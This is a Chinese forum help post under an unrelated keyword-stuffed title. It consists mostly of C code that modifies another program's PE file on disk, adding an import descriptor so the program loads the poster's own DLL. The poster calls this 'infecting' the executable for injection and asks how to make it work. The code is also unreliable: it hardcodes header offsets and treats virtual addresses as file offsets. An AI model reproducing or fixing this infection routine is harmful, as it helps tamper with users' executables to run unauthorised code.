c语言apk进程注入,[求助]C语言感染PE增加导入表IDD实现注入

以下代码测试成功修改了目标PE的导入表.并增加了新导入项.可事实上目标PE启动并没有加载我的DLL.望前辈高人能给与指点.小弟拜谢先

int InfectImport(const char* Value,const char* Sub,const char* Name)

{

int Loop=0;

char Path[MAX_PATH]={0};

HKEY Key=0;

FILE* File=0;

char* Buffer=0;

unsigned long Size=0;

unsigned long Offset=0;

unsigned long Length=MAX_PATH;

EXCEPTION_POINTERS* Exception=0;

IMAGE_DOS_HEADER Dos={0};

IMAGE_NT_HEADERS NT={0};

IMAGE_DATA_DIRECTORY* Directory={0};

IMAGE_IMPORT_DESCRIPTOR* Import={0};

IMAGE_SECTION_HEADER Section={0};

__try

{

__try

{

RegOpenKeyEx(HKEY_LOCAL_MACHINE,Value,0,KEY_READ,&Key);

RegQueryValueEx(Key,Sub,0,0,Path,&Length);

fopen_s(&File,Path,TEXT("rb+"));

fread(&Dos,sizeof(IMAGE_DOS_HEADER),1,File);

fseek(File,Dos.e_lfanew,SEEK_SET);

fread(&NT,sizeof(IMAGE_NT_HEADERS),1,File);

fseek(File,Dos.e_lfanew+0xf8+0x28,SEEK_SET);

fread(&Section,sizeof(IMAGE_SECTION_HEADER),1,File);

//以上部分打开注册表查找目标程序路径.并打开文件流.读取DOS结构,NT结构和数据节

Size=NT.OptionalHeader.DataDirectory[1].Size;

Offset=Section.PointerToRawData+Section.Misc.VirtualSize;

Buffer=calloc(Size,sizeof(char));

Import=malloc(sizeof(IMAGE_IMPORT_DESCRIPTOR));

Directory=malloc(sizeof(IMAGE_DATA_DIRECTORY));

//以上部分获取导入表尺寸和数据节空隙的起始位置.并申请一些必要的空间

fseek(File,Offset,SEEK_SET);

fwrite(Name,sizeof(char),16,File);

//以上部分在空隙起始位置写入自己的DLL名称

Import->Characteristics=0;

Import->FirstThunk=Offset+0x14;

Import->ForwarderChain=0;

Import->Name=Offset;

Import->OriginalFirstThunk=Offset+0x10;

Import->TimeDateStamp=0;

fseek(File,NT.OptionalHeader.DataDirectory[1].VirtualAddress+Size-0x14,SEEK_SET);

fwrite(Import,sizeof(IMAGE_IMPORT_DESCRIPTOR),1,File);

fseek(File,NT.OptionalHeader.DataDirectory[1].VirtualAddress,SEEK_SET);

fread(Buffer,sizeof(char),Size,File);

fseek(File,Offset+0x18,SEEK_SET);

fwrite(Buffer,sizeof(char),Size,File);

Directory->Size=Size+0x14;

Directory->VirtualAddress=Offset+0x18;

fseek(File,Dos.e_lfanew+sizeof(IMAGE_NT_HEADERS)-0x78,SEEK_SET);

fwrite(Directory,sizeof(IMAGE_DATA_DIRECTORY),1,File);

//以上部分为重建导入表

}

__except(EXCEPTION_EXECUTE_HANDLER)

{

Exception=GetExceptionInformation();

//看心情作一些异常处理的工作

}

}

__finally

{

free(Buffer);

free(Import);

free(Directory);

RegCloseKey(Key);

_fcloseall();

}

return 0;

}

以上代码为测试所用.细节不够严谨.

不过如有前辈高人.看出有些原则错误和逻辑错误.请指点.小弟虚心改正.